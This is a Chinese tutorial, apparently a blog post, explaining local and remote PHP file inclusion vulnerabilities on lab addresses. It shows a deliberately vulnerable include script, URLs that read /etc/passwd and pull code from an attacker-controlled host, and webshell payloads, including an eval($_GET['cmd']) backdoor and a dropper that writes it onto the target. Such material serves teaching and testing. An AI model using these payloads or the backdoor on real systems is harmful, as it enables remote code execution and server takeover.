文件包含漏洞(1),文件包含漏洞的利用原理

文件包含漏洞利用的原理

一, 本地文件包含

1. 漏洞利用条件:

在默认情况下, php.ini配置文件中 allow_url_fopen=On 是开启状态.

服务器php脚本中的 include include_once require require_once 等函数用于包含文件中的代码, 如果参数是用户可控的, 则可能被利用来执行系统命令或执行恶意代码. 例如:

http://192.168.112.200/security/fileinc.php

php 复制代码
<?php
$filename = $_GET['filename'];
include $filename;    // 或include_once, require, require_once
echo "<hr>欢迎来到PHP的世界.<br>";
?>

这里GET方法的 filename 参数用户可控, 且没有对包含的文件进行过滤和限制.

2. 利用方式
py 复制代码
读取系统文件
http://192.168.112.200/security/fileinc.php?filename=/etc/passwd
渲染html页面
http://192.168.112.200/security/fileinc.php?filename=login.html

二, 远程文件包含

1. 漏洞利用条件:

在默认情况下, php.ini配置文件中 allow_url_include=Off 是关闭状态.

如果该项配置被打开, 且include参数是用户可控的, 则可能被用于执行攻击者服务器上的恶意代码.

2. 利用方式:

假设 192.168.112.201 是攻击者的服务器

2.1 直接执行远程php代码
py 复制代码
http://192.168.112.200/security/fileinc.php?filename=http://192.168.112.201/security/test/mm.php
2.2 包含远程木马代码, 提交参数执行命令

木马文件: http://192.168.112.201/security/test/mm2.txt:

php 复制代码
<?php @eval($_GET['cmd']); ?>

注意包含恶意代码的文件后缀名是txt, 而不是php.

因为我们需要的是把mm2.txt文件中代码包含到目标fileinc.php当中去执行, 而不是在192.168.112.201上面直接执行php脚本.

包含远程脚本代码, 提交参数执行命令

py 复制代码
http://192.168.112.200/security/fileinc.php?
filename=http://192.168.112.201/security/test/mm2.txt&cmd=phpinfo();

http://192.168.112.200/security/fileinc.php?
filename=http://192.168.112.200/security/test/mm2.txt&cmd=system("ifconfig");

此时 &cmd=phpinfo(); 这里是提交的参数, 目标服务器经过包含mm2.txt文件内的代码之后, 即可执行参数中的命令.

2.3 通过远程php脚本将恶意代码写入到目标服务器.

木马文件: http://192.168.112.201/security/test/mm3.php:

php 复制代码
<?php 
$code = '<?php @eval($_GET["cmd"]); ?>';
file_put_contents("test/mm3_in.php", $code);
?>

以上代码在目标服务器test/目录下创建一个mm3_in.php木马文件.

利用文件包含漏洞执行代码:

py 复制代码
http://192.168.112.200/security/fileinc.php?filename=http://192.168.112.200/security/test/mm3.txt

执行成功后, 即可利用mm3_in.php:

py 复制代码
http://192.168.112.200/security/test/mm3_in.php?cmd=phpinfo();
相关推荐
qingtian!3 天前
matrix-breakout-2-morpheus靶机渗透
网络安全·渗透测试·靶机复现
vortex54 天前
AD渗透中服务账号相关攻击手法总结(Kerberoasting、委派)
windows·网络安全·渗透测试·ad
Jzhoucdc6 天前
CPTS-Manager ADCS ESC7利用
渗透测试·cpts
-曾牛7 天前
Upload-Labs靶场全20关通关攻略(含原理+实操+环境配置)
网络安全·渗透测试·靶场·文件上传漏洞·攻略·靶场教程·漏洞练习
独行soc7 天前
2025年渗透测试面试题总结-42(题目+回答)
android·数据库·安全·adb·面试·渗透测试·sqlite
Jzhoucdc11 天前
log4jshell CVE-2021-44228 复现
渗透测试·log4j
独行soc12 天前
2025年渗透测试面试题总结-38(题目+回答)
android·安全·网络安全·面试·职场和发展·渗透测试·求职
独行soc16 天前
2025年渗透测试面试题总结-29(题目+回答)
web安全·职场和发展·渗透测试·单元测试·压力测试
qingtian!17 天前
vulnhub-billu_b0x靶机渗透
网络安全·渗透测试
Jzhoucdc17 天前
CPTS-Agile (Werkzeug / Flask Debug)
渗透测试·cpts